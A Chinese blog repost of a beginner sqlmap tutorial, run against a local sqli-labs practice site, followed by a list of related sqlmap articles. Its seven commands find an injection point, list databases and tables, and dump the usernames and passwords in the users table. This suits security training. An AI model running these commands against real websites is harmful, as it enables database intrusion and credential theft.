SQLMAP简单使用

最新推荐文章于 2022-07-20 18:48:58 发布
最新推荐文章于 2022-07-20 18:48:58 发布
阅读量164 收藏
点赞数
分类专栏: 测试 sqlmap 文章标签: 测试 sqlmap
原文链接:https://jingyan.baidu.com/article/eae078276530621fec5485b9.html
版权

SQLMAP简单使用

      SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft  SQL  Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

工具/原料

  • sqli-labs https://jingyan.baidu.com/article/67662997a0527d54d51b84df.html

  • sqlmap

方法/步骤

  1. 1

    以sqli-labs第一关进行测试,使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第一关系统正常运行如下。

    SQLMAP简单使用

  2. 2

    打开sqlmap输入Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" (-u参数指定目标注入地址)检测出存在可利用漏洞。

    SQLMAP简单使用

    SQLMAP简单使用

  3. 3

    使用sqlmap注入获取数据库,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1"  --dbs 列取数据库的所有库。如图查询到所有库的名称。

    SQLMAP简单使用

    SQLMAP简单使用

  4. 4

    列出当前数据库使用参数--current-db输入命令。Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --current-db,如下图查询出当前库为security。

    SQLMAP简单使用

    SQLMAP简单使用

  5. 5

    查询security库中存在的所有表,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security --tables如下图查询出四个表。

    SQLMAP简单使用

    SQLMAP简单使用

  6. 6

    列出security库中users表中的所有列,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns(-D dbname指定数据库名称、-T tablename:指定某数据表的名称、--columns:列出指定表上的所有列)。

    SQLMAP简单使用

    SQLMAP简单使用

  7. 7

    导出三个数据列中所有的数据:Python2 sqlmap.py -u "http://10.10.10.1/

    sqli-labs-master/Less-1/?id=1" -D security -T users -C id,username,password --dump (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、--dump:导出列里面的字段)。

    SQLMAP简单使用

    SQLMAP简单使用

     

_我要早睡晚起
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
SQLmap简单使用
11-03
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源自动化工具,目前支持的数据库是MySQL、Oracle、PostgreSQL、SQL Server、Access、DB2、SQLite、Sybase等。没有图形化界面,通过...下面简单介绍一下sqlmap使用
sqlmap工具学习记
m0_70483044的博客
07-20 601
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。Sqlmap的强大的功能包括 数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时执行任意命令。是sql注入方面一个强大的工具!...
sqlmap安装(python2或python3都行)
weixin_42213694的博客
10-28 3249
sqlmap要在Python环境中使用,所以还要先下载安装配置好PythonPython下载安装(小白教程))。 注意:重点来了——网上无数的帖子和回答都说sqlmap一定要在py2环境中才能使用,完全不用,python3.6开始就已经可以支持sqlmap了,所以只要在官网中下载最新版本的python即可。 一)sqlmap的下载网址:http://sqlmap.org/,如下图: 解压到安装Python的目录下,如下图: 为了后续每次操作时方便打开,我们对下载的sqlmap文件夹重命名为 sqlma
SQLMap
WX公众号-小白学安全
10-26 3645
概述 ​ SQLMap是一款开源、自动化的SQL注入漏洞检测工具,主要功能是扫描、发现并利用给定URL的SQL注入漏洞,能够检测动态页面中的get/post参数、cookie、http头、还可以查看数据、文件系统访问、甚至能够操作系统命令执行。 支持的数据库:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 检测方式:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入 基
python调用sqlmapapi实现批量扫描网站
weixin_43996007的博客
02-22 4129
python调用sqlmapapi实现批量扫描网站 1、介绍 众所周知,sqlmap是一个非常强大的注入扫描工具。利用它可以自动化检测和利用SQL注入缺陷以达到接管控制网站后台数据库的目的。 但是再强大的工具总会存在一些缺陷的地方——比如每进行一个扫描任务,都需要再次开启一个命令行;使用相同的参数扫描网站时需要多次输入,浪费时间,效率低下。不过好在sqlmap提供了一个强大的api可以弥补这些缺陷。 sqlmapapi分为服务端和客户端,默认端口为8775。使用方法如下: 其中,-p参数可以指定端口号,-
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
sqlmap工具
11-26
sqlmap工具测试sql注入非常方便,使用非常简单sqlmap漏洞测试
sqlmap演示
11-17
简单介绍下 sqlmap 吧,它是一个自动化的 SQL 注入工具,其主要功能是扫描,发现并利用给定的 URL 的 SQL 注入漏洞,目前支持的数据库是 MS-SQL,,MYSQL,ORACLE 和POSTGRESQL。SQLMAP 采用四种独特的 SQL 注入技术,...
sqlmap payload简单分析(B E T U S)
12-01
介绍了sqlmap几种注入方式 博客地址: http://blog.csdn.net/think_ycx/article/details/51453855
sqlmap安装(不用一定要python2,python3也行的)
weixin_46709219的博客
07-28 8040
sqlmap要在Python环境中使用,所以还要先下载安装配置好Python(我前面已经有详细讲解Python下载安装过程了:Python下载安装(小白教程))。 注意:重点来了——网上无数的帖子和回答都说sqlmap一定要在py2环境中才能使用,完全不用,python3.6开始就已经可以支持sqlmap了,所以只要在官网中下载最新版本的python即可。 一)sqlmap的下载网址:http://sqlmap.org/,如下图: 解压到安装Python的目录下,如下图: 为了后续每次操作时方便打开,我
sqlmap使用方法
qq_41679358的博客
07-27 1509
SQLmap使用 参数 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=COOKIE HTTP Cookie的值 –random-agent 随机选择 HTTP Us
sqlmap获取mysql数据库_(五)SQLMap工具检测SQL注入漏洞、获取数据库中的数据
weixin_39578516的博客
02-03 993
目录结构利用SQLMap自动化工具,可判断某个带参数的url是否可被SQL注入,继而获取数据库和服务器的相关敏感数据和信息(如:库、表、列、字段值、数据库和服务器的名称&版本...)。本文以本地环境搭建的Web漏洞环境(OWASP Mutillidae+phpStudy)进行测试,具体操作流程如下:Mutillidae漏洞程序备注说明:因操作系统中同时安装有Python2和Python3的...
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2135
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
linux下sqlmap安装教程,Linux安装sqlmap
weixin_36436810的博客
05-10 1054
由于做的网站被SQL注入,为了测试sql注入,学习了渗透测试工具sqlmap。其在Linux云服务器上的安装步骤如下:1、用git命令安装。git clone https://github.com/sqlmapproject/sqlmap.git2、如果没有安装git,先装git。yum -y install git3、安装完sqlmap,当前目录下会多一个sqlmap的目录。进入sqlmap目录...
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4000
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
【渗透工具】P 3-3 sqlmap请求参数设置
Z_David_Z的博客
02-17 500
目录sqlmap设置HTTP方法sqlmap设置POST提交参数sqlmap设置参数分割符sqlmap设置Cookie头sqlmap设置User-Agentsqlmap设置Host头sqlmap设置Referer头sqlmap设置额外HTTP头sqlmap设置HTTP协议认证sqlmap设置HTTP代理sqlmap设置Tor隐藏网络sqlmap设置延迟sqlmap设置超时sqlmap设置重试次数sqlmap设置随机化参数sqlmap设置日志过滤目标sqlmap设置忽略401sqlmap设置HTTP协议私钥s
sqlmap注入总结
weixin_34321753的博客
08-22 1417
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
sqlmap入门级使用技巧
Deeeelete的博客
11-27 230
这里主要是利用dvwa环境进行工具演示 1:首选是找到sql注入的界面,也就是SQL injection界面,然后在输入框中输入任意数字,这里以1作为演示,作为一个get传入数值,url中已经显示了我们传入的变量 2:接下来是获取页面的cookie数值,打开开发者工具,按f12开启,找到控制台console,输入document.cookie回车 "security=low; PHPSESSID=...
sqlmap使用教程
最新发布
09-13
关于sqlmap使用教程,以下是一些基本的指导步骤: ...这只是一个简单的入门指南,sqlmap还有很多其他高级功能和选项。请记住,在进行任何安全测试之前,确保你已经获得相关授权,并且在合法和道德的框架内进行测试

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值